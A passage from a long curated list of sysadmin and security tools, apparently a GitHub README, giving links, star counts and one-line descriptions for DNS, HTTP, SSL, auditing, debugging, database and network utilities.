<b><code>&nbsp;&nbsp;8041⭐</code></b> <b><code>&nbsp;&nbsp;1090🍴</code></b> <a href="https://github.com/subfinder/subfinder"><b>subfinder</b></a></a> - is a subdomain discovery tool that discovers valid subdomains for websites.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8537⭐</code></b> <b><code>&nbsp;&nbsp;2000🍴</code></b> <a href="https://github.com/aboul3la/Sublist3r"><b>sublist3r</b></a></a> - is a fast subdomains enumeration tool for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;9861⭐</code></b> <b><code>&nbsp;&nbsp;1729🍴</code></b> <a href="https://github.com/OWASP/Amass"><b>amass</b></a></a> - is tool that obtains subdomain names by scraping data sources, crawling web archives, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;863⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;164🍴</code></b> <a href="https://github.com/google/namebench"><b>namebench</b></a></a> - provides personalized DNS server recommendations based on your browsing history.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2746⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;453🍴</code></b> <a href="https://github.com/blechschmidt/massdns"><b>massdns</b></a></a> - is a high-performance DNS stub resolver for bulk lookups and reconnaissance.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3449⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;827🍴</code></b> <a href="https://github.com/guelfoweb/knock"><b>knock</b></a></a> - is a tool to enumerate subdomains on a target domain through a wordlist.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;329⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;58🍴</code></b> <a href="https://github.com/DNS-OARC/dnsperf"><b>dnsperf</b></a></a> - DNS performance testing tools.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10280⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;990🍴</code></b> <a href="https://github.com/jedisct1/dnscrypt-proxy"><b>dnscrypt-proxy 2</b></a></a> - a flexible DNS proxy, with support for encrypted DNS protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;84⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;19🍴</code></b> <a href="https://github.com/dnsdb/dnsdbq"><b>dnsdbq</b></a></a> - API client providing access to passive DNS database systems.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1337⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;108🍴</code></b> <a href="https://github.com/looterz/grimd"><b>grimd</b></a></a> - fast dns proxy, built to black-hole internet advertisements and malware servers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4083⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;703🍴</code></b> <a href="https://github.com/elceef/dnstwist"><b>dnstwist</b></a></a> - detect typosquatters, phishing attacks, fraud, and brand impersonation.<br> </p> ##### :black_small_square: Network (HTTP) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://curl.haxx.se/">🌎 <b>curl</b></a> - is a command line tool and library for transferring data with URLs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gitlab.com/davidjpeacock/kurly">🌎 <b>kurly</b></a> - is an alternative to the widely popular curl program, written in Golang.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;28843⭐</code></b> <b><code>&nbsp;&nbsp;3798🍴</code></b> <a href="https://github.com/jakubroztocil/httpie"><b>HTTPie</b></a></a> - is an user-friendly HTTP client.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10357⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;431🍴</code></b> <a href="https://github.com/asciimoo/wuzz"><b>wuzz</b></a></a> - is an interactive cli tool for HTTP inspection.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;581⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;75🍴</code></b> <a href="https://github.com/summerwind/h2spec"><b>h2spec</b></a></a> - is a conformance testing tool for HTTP/2 implementation.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;364⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;34🍴</code></b> <a href="https://github.com/gildasio/h2t"><b>h2t</b></a></a> - is a simple tool to help sysadmins to hardening their websites.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3643⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;232🍴</code></b> <a href="https://github.com/trimstray/htrace.sh"><b>htrace.sh</b></a></a> - is a simple Swiss Army knife for http/https troubleshooting and profiling.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5448⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;386🍴</code></b> <a href="https://github.com/reorx/httpstat"><b>httpstat</b></a></a> - is a tool that visualizes curl statistics in a way of beauty and clarity.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3915⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;132🍴</code></b> <a href="https://github.com/gchaincl/httplab"><b>httplab</b></a></a> - is an interactive web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lynx.browser.org/">🌎 <b>Lynx</b></a> - is a text browser for the World Wide Web.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/browsh-org/browsh/"><b>Browsh</b></a></a> - is a fully interactive, real-time, and modern text-based browser.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5957⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;430🍴</code></b> <a href="https://github.com/dhamaniasad/HeadlessBrowsers"><b>HeadlessBrowsers</b></a></a> - a list of (almost) all headless web browsers in existence.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://httpd.apache.org/docs/2.4/programs/ab.html">🌎 <b>ab</b></a> - is a single-threaded command line tool for measuring the performance of HTTP web servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.joedog.org/siege-home/">🌎 <b>siege</b></a> - is an http load testing and benchmarking utility.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;34984⭐</code></b> <b><code>&nbsp;&nbsp;2834🍴</code></b> <a href="https://github.com/wg/wrk"><b>wrk</b></a></a> - is a modern HTTP benchmarking tool capable of generating significant load.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3918⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;352🍴</code></b> <a href="https://github.com/giltene/wrk2"><b>wrk2</b></a></a> - is a constant throughput, correct latency recording variant of wrk.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;21678⭐</code></b> <b><code>&nbsp;&nbsp;1308🍴</code></b> <a href="https://github.com/tsenart/vegeta"><b>vegeta</b></a></a> - is a constant throughput, correct latency recording variant of wrk.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4490⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;277🍴</code></b> <a href="https://github.com/codesenberg/bombardier"><b>bombardier</b></a></a> - is a fast cross-platform HTTP benchmarking tool written in Go.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;442⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;99🍴</code></b> <a href="https://github.com/cmpxchg16/gobench"><b>gobench</b></a></a> - http/https load testing and benchmarking tool.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;16086⭐</code></b> <b><code>&nbsp;&nbsp;1118🍴</code></b> <a href="https://github.com/rakyll/hey"><b>hey</b></a></a> - HTTP load generator, ApacheBench (ab) replacement, formerly known as rakyll/boom.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1208⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;101🍴</code></b> <a href="https://github.com/tarekziade/boom"><b>boom</b></a></a> - is a script you can use to quickly smoke-test your web app deployment.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1380⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;290🍴</code></b> <a href="https://github.com/shekyan/slowhttptest"><b>SlowHTTPTest</b></a></a> - is a tool that simulates some Application Layer Denial of Service attacks by prolonging HTTP.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8006⭐</code></b> <b><code>&nbsp;&nbsp;1089🍴</code></b> <a href="https://github.com/OJ/gobuster"><b>gobuster</b></a></a> - is a free and open source directory/file & DNS busting tool written in Go.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1643⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;259🍴</code></b> <a href="https://github.com/ssllabs/ssllabs-scan"><b>ssllabs-scan</b></a></a> - command-line reference-implementation client for SSL Labs APIs.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1782⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;171🍴</code></b> <a href="https://github.com/mozilla/http-observatory"><b>http-observatory</b></a></a> - Mozilla HTTP Observatory cli version.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hurl.dev">🌎 <b>Hurl</b></a> - is a command line tool to run and test HTTP requests with plain text.<br> </p> ##### :black_small_square: SSL <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openssl.org/">🌎 <b>openssl</b></a> - is a robust, commercial-grade, and full-featured toolkit for the TLS and SSL protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html">🌎 <b>gnutls-cli</b></a> - client program to set up a TLS connection to some other computer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nabla-c0d3/sslyze"><b>sslyze </b></a> - fast and powerful SSL/TLS server scanning library.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1978⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;371🍴</code></b> <a href="https://github.com/rbsec/sslscan"><b>sslscan</b></a></a> - tests SSL/TLS enabled services to discover supported cipher suites.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7114⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;969🍴</code></b> <a href="https://github.com/drwetter/testssl.sh"><b>testssl.sh</b></a></a> - testing TLS/SSL encryption anywhere on any port.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1908⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;280🍴</code></b> <a href="https://github.com/mozilla/cipherscan"><b>cipherscan</b></a></a> - a very simple way to find out which SSL ciphersuites are supported by a target.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.tarsnap.com/spiped.html"><b>spiped</b></a> - is a utility for creating symmetrically encrypted and authenticated pipes between socket addresses.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;30130⭐</code></b> <b><code>&nbsp;&nbsp;3377🍴</code></b> <a href="https://github.com/certbot/certbot"><b>Certbot</b></a></a> - is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;42132⭐</code></b> <b><code>&nbsp;&nbsp;2228🍴</code></b> <a href="https://github.com/FiloSottile/mkcert"><b>mkcert</b></a></a> - simple zero-config tool to make locally trusted development certificates with any names you'd like.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2089⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;211🍴</code></b> <a href="https://github.com/square/certstrap"><b>certstrap</b></a></a> - tools to bootstrap CAs, certificate requests, and signed certificates.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;932⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;166🍴</code></b> <a href="https://github.com/yassineaboukir/sublert"><b>Sublert</b></a></a> - is a security and reconnaissance tool to automatically monitor new subdomains.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;346⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;53🍴</code></b> <a href="https://github.com/trimstray/mkchain"><b>mkchain</b></a></a> - open source tool to help you build a valid SSL certificate chain.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;679⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;277🍴</code></b> <a href="https://github.com/Matty9191/ssl-cert-check"><b>ssl-cert-check</b></a></a> - SSL Certification Expiration Checker.<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/ch-selinux">🌎 <b>SELinux</b></a> - provides a flexible Mandatory Access Control (MAC) system built into the Linux kernel.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.ubuntu.com/AppArmor">🌎 <b>AppArmor</b></a> - proactively protects the operating system and applications from external or internal threats.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;840⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;77🍴</code></b> <a href="https://github.com/grapheneX/grapheneX"><b>grapheneX</b></a></a> - Automated System Hardening Framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dev-sec/"><b>DevSec Hardening Framework</b></a> - Security + DevOps: Automatic Server Hardening.<br> </p> ##### :black_small_square: Auditing Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ossec.net/">🌎 <b>ossec</b></a> - actively monitoring all aspects of system activity with file integrity monitoring.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing">🌎 <b>auditd</b></a> - provides a way to track security-relevant information on your system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.nongnu.org/tiger/">🌎 <b>Tiger</b></a> - is a security tool that can be use both as a security audit and intrusion detection system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cisofy.com/lynis/">🌎 <b>Lynis</b></a> - battle-tested security tool for systems running Linux, macOS, or Unix-based operating system.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6110⭐</code></b> <b><code>&nbsp;&nbsp;1936🍴</code></b> <a href="https://github.com/rebootuser/LinEnum"><b>LinEnum</b></a></a> - scripted Local Linux Enumeration & Privilege Escalation Checks.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;114⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;30🍴</code></b> <a href="https://github.com/installation/rkhunter"><b>Rkhunter</b></a></a> - scanner tool for Linux systems that scans backdoors, rootkits and local exploits on your systems.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2573⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;390🍴</code></b> <a href="https://github.com/hasherezade/pe-sieve"><b>PE-sieve</b></a></a> - is a light-weight tool that helps to detect malware running on the system.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13040⭐</code></b> <b><code>&nbsp;&nbsp;2797🍴</code></b> <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite"><b>PEASS</b></a></a> - privilege escalation tools for Windows and Linux/Unix and MacOS.<br> </p> ##### :black_small_square: System Diagnostics/Debuggers <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1847⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;384🍴</code></b> <a href="https://github.com/strace/strace"><b>strace</b></a></a> - diagnostic, debugging and instructional userspace utility for Linux.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://dtrace.org/blogs/about/"><b>DTrace</b></a> - is a performance analysis and troubleshooting tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Ltrace">🌎 <b>ltrace</b></a> - is a library call tracer, used to trace calls made by programs to library functions.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;120⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;7🍴</code></b> <a href="https://github.com/brainsmoke/ptrace-burrito"><b>ptrace-burrito</b></a></a> - is a friendly wrapper around ptrace.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;9195⭐</code></b> <b><code>&nbsp;&nbsp;1585🍴</code></b> <a href="https://github.com/brendangregg/perf-tools"><b>perf-tools</b></a></a> - performance analysis tools based on Linux perf_events (aka perf) and ftrace.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7044⭐</code></b> <b><code>&nbsp;&nbsp;1157🍴</code></b> <a href="https://github.com/iovisor/bpftrace"><b>bpftrace</b></a></a> - high-level tracing language for Linux eBPF.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7347⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;716🍴</code></b> <a href="https://github.com/draios/sysdig"><b>sysdig</b></a></a> - system exploration and troubleshooting tool with first class support for containers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.valgrind.org/"><b>Valgrind</b></a> - is an instrumentation framework for building dynamic analysis tools.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7723⭐</code></b> <b><code>&nbsp;&nbsp;1449🍴</code></b> <a href="https://github.com/gperftools/gperftools"><b>gperftools</b></a></a> - high-performance multi-threaded malloc() implementation, plus some performance analysis tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nicolargo.github.io/glances/">🌎 <b>glances</b></a> - cross-platform system monitoring tool written in Python.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5796⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;616🍴</code></b> <a href="https://github.com/hishamhm/htop"><b>htop</b></a></a> - interactive text-mode process viewer for Unix systems. It aims to be a better 'top'.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10295⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;540🍴</code></b> <a href="https://github.com/aristocratos/bashtop"><b>bashtop</b></a></a> - Linux resource monitor written in pure Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://nmon.sourceforge.net/pmwiki.php"><b>nmon</b></a> - a single executable for performance monitoring and data analysis.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.atoptool.nl/">🌎 <b>atop</b></a> - ASCII performance monitor. Includes statistics for CPU, memory, disk, swap, network, and processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Lsof">🌎 <b>lsof</b></a> - displays in its output information about files that are opened by processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.brendangregg.com/flamegraphs.html"><b>FlameGraph</b></a> - stack trace visualizer.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1001⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;31🍴</code></b> <a href="https://github.com/zevv/lsofgraph"><b>lsofgraph</b></a></a> - convert Unix lsof output to a graph showing FIFO and UNIX interprocess communication.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8091⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;533🍴</code></b> <a href="https://github.com/mozilla/rr"><b>rr</b></a></a> - is a lightweight tool for recording, replaying and debugging execution of applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pcp.io/index.html">🌎 <b>Performance Co-Pilot</b></a> - a system performance analysis toolkit.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8381⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;223🍴</code></b> <a href="https://github.com/sharkdp/hexyl"><b>hexyl</b></a></a> - a command-line hex viewer.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1228⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;40🍴</code></b> <a href="https://github.com/p403n1x87/austin"><b>Austin</b></a></a> - Python frame stack sampler for CPython.<br> </p> ##### :black_small_square: Log Analyzers <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2774⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;67🍴</code></b> <a href="https://github.com/rcoh/angle-grinder"><b>angle-grinder</b></a></a> - slice and dice log files on the command line.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lnav.org">🌎 <b>lnav</b></a> - log file navigator with search and automatic refresh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://goaccess.io/">🌎 <b>GoAccess</b></a> - real-time web log analyzer and interactive viewer that runs in a terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6403⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;481🍴</code></b> <a href="https://github.com/lebinh/ngxtop"><b>ngxtop</b></a></a> - real-time metrics for nginx server.<br> </p> ##### :black_small_square: Databases <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8189⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;334🍴</code></b> <a href="https://github.com/xo/usql"><b>usql</b></a></a> - universal command-line interface for SQL databases.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;11228⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;518🍴</code></b> <a href="https://github.com/dbcli/pgcli"><b>pgcli</b></a></a> - postgres CLI with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10999⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;651🍴</code></b> <a href="https://github.com/dbcli/mycli"><b>mycli</b></a></a> - terminal client for MySQL with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1886⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;65🍴</code></b> <a href="https://github.com/dbcli/litecli"><b>litecli</b></a></a> - SQLite CLI with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1309⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;189🍴</code></b> <a href="https://github.com/dbcli/mssql-cli"><b>mssql-cli</b></a></a> - SQL Server CLI with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;20540⭐</code></b> <b><code>&nbsp;&nbsp;2454🍴</code></b> <a href="https://github.com/osquery/osquery"><b>OSQuery</b></a></a> - is a SQL powered operating system instrumentation, monitoring, and analytics framework.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2715⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;180🍴</code></b> <a href="https://github.com/ankane/pgsync"><b>pgsync</b></a></a> - sync data from one Postgres database to another.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2335⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;93🍴</code></b> <a href="https://github.com/laixintao/iredis"><b>iredis</b></a></a> - a terminal client for redis with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.schemacrawler.com/diagramming.html">🌎 <b>SchemaCrawler</b></a> - generates an E-R diagram of your database.<br> </p> ##### :black_small_square: TOR <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1651⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;312🍴</code></b> <a href="https://github.com/GouveaHeitor/nipe"><b>Nipe</b></a></a> - script to make Tor Network your default gateway.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;924⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;164🍴</code></b> <a href="https://github.com/trimstray/multitor"><b>multitor</b></a></a> - a tool that lets you create multiple TOR instances with a load-balancing.<br> </p> ##### :black_small_square: Messengers/IRC Clients <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://irssi.org">🌎 <b>Irssi</b></a> - is a free open source terminal based IRC client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weechat.org/">🌎 <b>WeeChat</b></a> - is an extremely extensible and lightweight IRC client.<br> </p> ##### :black_small_square: Productivity <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://taskwarrior.org">🌎 <b>taskwarrior</b></a> - task management system, todo list <br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;930⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;115🍴</code></b> <a href="https://github.com/skx/sysadmin-util"><b>sysadmin-util</b></a></a> - tools for Linux/Unix sysadmins.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://inotify.aiken.cz/"><b>incron</b></a> - is an inode-based filesystem notification technology.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5364⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;467🍴</code></b> <a href="https://github.com/axkibe/lsyncd"><b>lsyncd</b></a></a> - synchronizes local directories with remote targets (Live Syncing Daemon).<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3973⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;98🍴</code></b> <a href="https://github.com/rgburke/grv"><b>GRV</b></a></a> - is a terminal based interface for viewing Git repositories.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jonas.github.io/tig/">🌎 <b>Tig</b></a> - text-mode interface for Git.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;45130⭐</code></b> <b><code>&nbsp;&nbsp;3711🍴</code></b> <a href="https://github.com/tldr-pages/tldr"><b>tldr</b></a></a> - simplified and community-driven man pages.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4039⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;366🍴</code></b> <a href="https://github.com/mholt/archiver"><b>archiver</b></a></a> - easily create and extract .zip, .tar, .tar.gz, .tar.bz2, .tar.xz, .tar.lz4, .tar.sz, and .rar.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;25094⭐</code></b> <b><code>&nbsp;&nbsp;1739🍴</code></b> <a href="https://github.com/tj/commander.js"><b>commander.js</b></a></a> - minimal CLI creator in JavaScript.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;12308⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;309🍴</code></b> <a href="https://github.com/tomnomnom/gron"><b>gron</b></a></a> - make JSON greppable!<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1181⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;46🍴</code></b> <a href="https://github.com/itchyny/bed"><b>bed</b></a></a> - binary editor written in Go.<br> </p> #### GUI Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Terminal emulators <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4225⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;614🍴</code></b> <a href="https://github.com/Guake/guake"><b>Guake</b></a></a> - is a dropdown terminal made for the GNOME desktop environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnometerminator.blogspot.com/p/introduction.html">🌎 <b>Terminator</b></a> - is based on GNOME Terminal, useful features for sysadmins and other users.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sw.kovidgoyal.net/kitty/">🌎 <b>Kitty</b></a> - is a GPU based terminal emulator that supports smooth scrolling and images.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;48118⭐</code></b> <b><code>&nbsp;&nbsp;2822🍴</code></b> <a href="https://github.com/alacritty/alacritty"><b>Alacritty</b></a></a> - is a fast, cross-platform, OpenGL terminal emulator.<br> </p> ##### :black_small_square: Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wireshark.org/">🌎 <b>Wireshark</b></a> - is the world’s foremost and widely-used network protocol analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ettercap-project.org/">🌎 <b>Ettercap</b></a> - is a comprehensive network monitor tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://etherape.sourceforge.io/">🌎 <b>EtherApe</b></a> - is a graphical network monitoring solution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetsender.com/">🌎 <b>Packet Sender</b></a> - is a networking utility for packet generation and built-in UDP/TCP/SSL client and servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ostinato.org/">🌎 <b>Ostinato</b></a> - is a packet crafter and traffic generator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jmeter.apache.org/">🌎 <b>JMeter™</b></a> - open source software to load test functional behavior and measure performance.<br> &nbsp;&nbsp;:small_orange_diamond: 